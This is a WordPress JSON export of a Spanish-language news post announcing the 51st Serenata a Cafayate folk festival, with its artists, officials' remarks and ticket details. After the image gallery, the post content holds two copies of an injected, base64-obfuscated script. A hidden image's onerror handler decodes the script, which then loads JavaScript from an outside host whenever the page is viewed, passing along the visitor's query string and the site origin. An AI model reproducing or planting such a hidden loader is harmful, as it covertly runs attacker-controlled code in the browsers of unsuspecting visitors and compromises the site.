{"id":4793,"date":"2025-01-31T10:47:45","date_gmt":"2025-01-31T13:47:45","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4793"},"modified":"2025-08-13T23:41:32","modified_gmt":"2025-08-14T02:41:32","slug":"en-febrero-saltenos-y-turistas-disfrutaran-de-una-nueva-edicion-de-la-serenata-a-cafayate","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4793","title":{"rendered":"En febrero, salte\u00f1os y turistas disfrutar\u00e1n de una nueva edici\u00f3n de la Serenata a Cafayate"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-44ba1f69a0ec9871225a200a3dcbf488\" style=\"background-color:#950650\"><em>Del 20 al 22 de febrero, la Bodega Encantada de Cafayate ser\u00e1 el escenario de la 51\u00ba edici\u00f3n del festival m\u00e1s emblem\u00e1tico del NOA, que re\u00fane lo mejor de la m\u00fasica, la cultura y la gastronom\u00eda de la regi\u00f3n.<\/em><\/h4>\n\n\n\n<p>Esta ma\u00f1ana, en la Usina Cultural, se realiz\u00f3 el lanzamiento oficial con la presencia del secretario de Cultura,&nbsp;<strong>Diego Ashur M\u00e1s<\/strong>; la subsecretar\u00eda de Promoci\u00f3n Tur\u00edstica,&nbsp;<strong>Laura Alcorta<\/strong>; el subsecretario de Desarrollo y Competitividad Tur\u00edstica,&nbsp;<strong>Juan Lucero<\/strong>; la intendenta de Cafayate,&nbsp;<strong>Rita Guevara<\/strong>, y artistas locales.<\/p>\n\n\n\n<p>El Secretario de Cultura resalt\u00f3 la importancia del trabajo conjunto entre el gobierno provincial, los municipios del Valle Calchaqu\u00ed y el sector privado. \u201cLos festivales y fiestas populares forman parte de nuestra identidad. Este a\u00f1o, la Serenata se enmarca en una estrategia integral que busca potenciar la cultura salte\u00f1a y ofrecer experiencias \u00fanicas a quienes nos visitan\u201d, afirm\u00f3.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"En febrero, salte\u00f1os y turistas disfrutar\u00e1n de una nueva edici\u00f3n de la Serenata a Cafayate\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/LNo6QQrrCLQ?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Por su parte, la subsecretaria Alcorta subray\u00f3 que eventos como la Serenata son esenciales para consolidar a Salta como un destino tur\u00edstico de referencia.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15863-en-febrero-saltenios-y-turistas-disfrutaran-de-una-nueva-edicion-de-la-serenata-a-cafayate.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15863-en-febrero-saltenios-y-turistas-disfrutaran-de-una-nueva-edicion-de-la-serenata-a-cafayate.webp\" alt=\"En febrero, salte\u00f1os y turistas disfrutar\u00e1n de una nueva edici\u00f3n de la Serenata a Cafayate.\" style=\"width:367px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p><em><strong>Un festival con identidad propia<\/strong><\/em><\/p>\n\n\n\n<p>La Serenata a Cafayate se ha convertido en un punto de encuentro para miles de personas que buscan disfrutar de la m\u00fasica folkl\u00f3rica, la gastronom\u00eda regional y los paisajes \u00fanicos del Valle Calchaqu\u00ed. Durante tres noches, artistas de renombre como Chaque\u00f1o Palavecino, Jorge Rojas, Ahyre, Sergio Galleguillo, L\u00e1zaro Caballero, Franco Barrionuevo, Indio Lucio Rojas y Christian Herrera, entre otros, dar\u00e1n vida a este evento imperdible.<\/p>\n\n\n\n<p>Adem\u00e1s, el festival contar\u00e1 con actividades complementarias como ferias artesanales, muestras culturales y el tradicional Carnaval Serenatero, que se celebrar\u00e1 los d\u00edas viernes 21 y s\u00e1bado 22 de febrero en la plaza Michel Torino, con la participaci\u00f3n de Atemporal, Bruno Arias, Chiretes, Joaqu\u00edn Sosa, Ma\u00f1eros y Karvankas, entre otros.<\/p>\n\n\n\n<p>La intendenta de Cafayate, Rita Guevara, agradeci\u00f3 el esfuerzo de la comunidad y la comisi\u00f3n organizadora, destacando el rol del festival como un motor de desarrollo local.<\/p>\n\n\n\n<p>Las entradas pueden adquirirse en www.norteticket.com y en puntos de venta habilitados en Cafayate, Salta, Tucum\u00e1n, Jujuy, Santiago del Estero, C\u00f3rdoba, Corrientes, Misiones y San Luis.<\/p>\n\n\n\n<p>Para m\u00e1s informaci\u00f3n, visitar https:\/\/serenataacafayate.com\/.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"4794\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/10329-en-febrero-saltenios-y-turistas-disfrutaran-de-una-nueva-edicion-de-la-serenata-a-cafayate-1024x576.webp\" alt=\"\" class=\"wp-image-4794\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/10329-en-febrero-saltenios-y-turistas-disfrutaran-de-una-nueva-edicion-de-la-serenata-a-cafayate-1024x576.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/10329-en-febrero-saltenios-y-turistas-disfrutaran-de-una-nueva-edicion-de-la-serenata-a-cafayate-300x169.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/10329-en-febrero-saltenios-y-turistas-disfrutaran-de-una-nueva-edicion-de-la-serenata-a-cafayate-768x432.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/10329-en-febrero-saltenios-y-turistas-disfrutaran-de-una-nueva-edicion-de-la-serenata-a-cafayate-746x420.webp 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/10329-en-febrero-saltenios-y-turistas-disfrutaran-de-una-nueva-edicion-de-la-serenata-a-cafayate-696x392.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/10329-en-febrero-saltenios-y-turistas-disfrutaran-de-una-nueva-edicion-de-la-serenata-a-cafayate.webp 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"4795\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/10330-en-febrero-saltenios-y-turistas-disfrutaran-de-una-nueva-edicion-de-la-serenata-a-cafayate-1024x576.webp\" alt=\"\" class=\"wp-image-4795\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/10330-en-febrero-saltenios-y-turistas-disfrutaran-de-una-nueva-edicion-de-la-serenata-a-cafayate-1024x576.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/10330-en-febrero-saltenios-y-turistas-disfrutaran-de-una-nueva-edicion-de-la-serenata-a-cafayate-300x169.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/10330-en-febrero-saltenios-y-turistas-disfrutaran-de-una-nueva-edicion-de-la-serenata-a-cafayate-768x432.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/10330-en-febrero-saltenios-y-turistas-disfrutaran-de-una-nueva-edicion-de-la-serenata-a-cafayate-746x420.webp 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/10330-en-febrero-saltenios-y-turistas-disfrutaran-de-una-nueva-edicion-de-la-serenata-a-cafayate-696x392.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/10330-en-febrero-saltenios-y-turistas-disfrutaran-de-una-nueva-edicion-de-la-serenata-a-cafayate.webp 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Del 20 al 22 de febrero, la Bodega Encantada de Cafayate ser\u00e1 el escenario de la 51\u00ba edici\u00f3n del festival m\u00e1s emblem\u00e1tico del NOA, que re\u00fane lo mejor de la m\u00fasica, la cultura y la gastronom\u00eda de la regi\u00f3n. Esta ma\u00f1ana, en la Usina Cultural, se realiz\u00f3 el lanzamiento oficial con la presencia del secretario [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4796,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13],"tags":[],"class_list":{"0":"post-4793","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4793"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4793"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4793\/revisions"}],"predecessor-version":[{"id":6583,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4793\/revisions\/6583"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4796"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4793"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4793"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4793"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}